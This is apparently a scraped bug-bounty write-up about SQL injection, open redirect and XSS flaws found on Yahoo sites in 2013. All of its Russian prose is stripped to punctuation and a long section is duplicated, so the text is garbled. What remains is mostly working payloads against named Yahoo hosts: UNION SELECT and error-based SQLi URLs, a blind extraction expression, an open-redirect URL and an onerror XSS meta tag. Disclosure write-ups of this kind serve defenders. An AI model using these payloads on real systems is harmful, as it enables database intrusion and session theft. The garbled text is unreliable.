sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1

.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1

.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info&region=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .

Source: https://habr.com/ru/post/212317/
